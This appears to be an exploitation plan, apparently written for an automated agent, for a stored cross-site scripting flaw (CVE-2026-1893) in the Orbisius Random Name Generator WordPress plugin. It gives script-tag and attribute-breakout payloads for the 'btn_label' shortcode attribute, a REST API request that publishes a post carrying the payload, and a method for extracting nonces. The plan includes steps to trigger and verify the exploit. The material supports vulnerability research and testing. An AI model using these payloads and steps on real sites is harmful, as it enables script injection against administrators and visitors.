Orbisius Random Name Generator <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'btn_label' Shortcode Attribute

This research plan outlines the steps required to analyze and exploit CVE-2026-1893, a Stored Cross-Site Scripting (XSS) vulnerability in the Orbisius Random Name Generator plugin.

1. Vulnerability Summary

The Orbisius Random Name Generator plugin (<= 1.0.2) is vulnerable to Stored XSS via the btn_label attribute of its primary shortcode [orbisius_random_name_generator]. The plugin fails to sanitize the attribute when provided in the shortcode and fails to escape it when rendering the button in the HTML output. Since Contributors can create and save posts containing shortcodes, they can inject malicious scripts that execute in the context of any user (including Administrators) viewing the page.

2. Attack Vector Analysis

• Vulnerable Attribute: btn_label
• Shortcode: [orbisius_random_name_generator]
• Authentication Level: Contributor or higher (any role with edit_posts capability).
• Injection Point: The content of a WordPress Post or Page.
• Execution Point: The frontend view of the post/page where the shortcode is processed and rendered.

3. Code Flow (Inferred)

1. Registration: The plugin registers the shortcode using add_shortcode('orbisius_random_name_generator', '...') in the main plugin file (likely orbisius-random-name-generator.php).
2. Attribute Handling: The callback function for the shortcode likely uses shortcode_atts() to parse user-supplied attributes.
3. Rendering (The Sink): The btn_label attribute is extracted from the $atts array and concatenated into an HTML string (likely a <button> or <input type="button"> element).
4. Failure: The code returns or echoes this string without using esc_attr() (if inside an attribute) or esc_html() (if inside a tag), allowing for HTML/Script injection.

4. Nonce Acquisition Strategy

This vulnerability is exploited through standard WordPress post creation. No specific plugin-level AJAX nonces are required to trigger the XSS. However, to create the post as a Contributor via the REST API or admin-ajax.php, the agent must handle standard WordPress authentication and nonces.

Strategy:

1. Log in as a Contributor user.
2. Navigate to the "Add New Post" page: browser_navigate("/wp-admin/post-new.php").
3. Extract the standard WordPress _wpnonce from the page source if using the legacy editor, or use the REST API with the X-WP-Nonce header.
4. The X-WP-Nonce can be found in the wp-admin source: browser_eval("wpApiSettings.nonce").

5. Exploitation Strategy

The goal is to prove that a script can be stored and executed.

Step 1: Test for Attribute Breakout
Since the attribute is likely rendered inside a value or as text within a <button>, we test both.

• Payload A (Tag Content): [orbisius_random_name_generator btn_label='<script>alert("XSS_CONTENT")</script>']
• Payload B (Attribute Breakout): [orbisius_random_name_generator btn_label='"><script>alert("XSS_ATTR")</script>']

Step 2: Create Malicious Post
Use the http_request tool to create a post.

• URL: /wp-json/wp/v2/posts
• Method: POST
• Headers:
  • Content-Type: application/json
  • X-WP-Nonce: [EXTRACTED_NONCE]
• Body:

  {
    "title": "Names List",
    "content": "[orbisius_random_name_generator btn_label='<script>console.log(\"CVE-2026-1893-EXPLOITED\")</script>']",
    "status": "publish"
  }
  

Step 3: Trigger the XSS

• Navigate to the newly created post URL as an Administrator.
• Observe the console for the "CVE-2026-1893-EXPLOITED" message.

6. Test Data Setup

1. Users: Create a user with the contributor role.
2. Plugin: Ensure orbisius-random-name-generator version 1.0.2 is installed and active.
3. Environment: WordPress instance with Permalinks enabled (for easy REST API access).

7. Expected Results

• The Contributor should be able to save the post containing the shortcode.
• When viewing the post source, the btn_label value should appear raw in the HTML.
• Example Vulnerable Output:

  <button class="..." onclick="...">
    <script>console.log("CVE-2026-1893-EXPLOITED")</script>
  </button>
  

• The script should execute automatically on page load.

8. Verification Steps

1. Database Check: Use wp_cli to verify the content was stored:
   wp post list --post_type=post --format=json
   Check the post_content for the injected script.
2. HTML Response Check: Use http_request to GET the post frontend and check if the payload is escaped:
   response_body.contains('<script>console.log("CVE-2026-1893-EXPLOITED")</script>')
   If it is escaped as <script>, the exploit failed.

9. Alternative Approaches

If the plugin renders the button via an AJAX call instead of a direct shortcode return:

1. Identify the AJAX action: grep -r "wp_ajax" .
2. Check if the AJAX handler also accepts the btn_label parameter.
3. If so, determine if the AJAX handler requires a nonce (standard check_ajax_referer check).
4. Use browser_eval to find the nonce if it's localized: window.orbisius_rng_obj?.nonce.
5. Send a direct POST request to /wp-admin/admin-ajax.php with the malicious btn_label.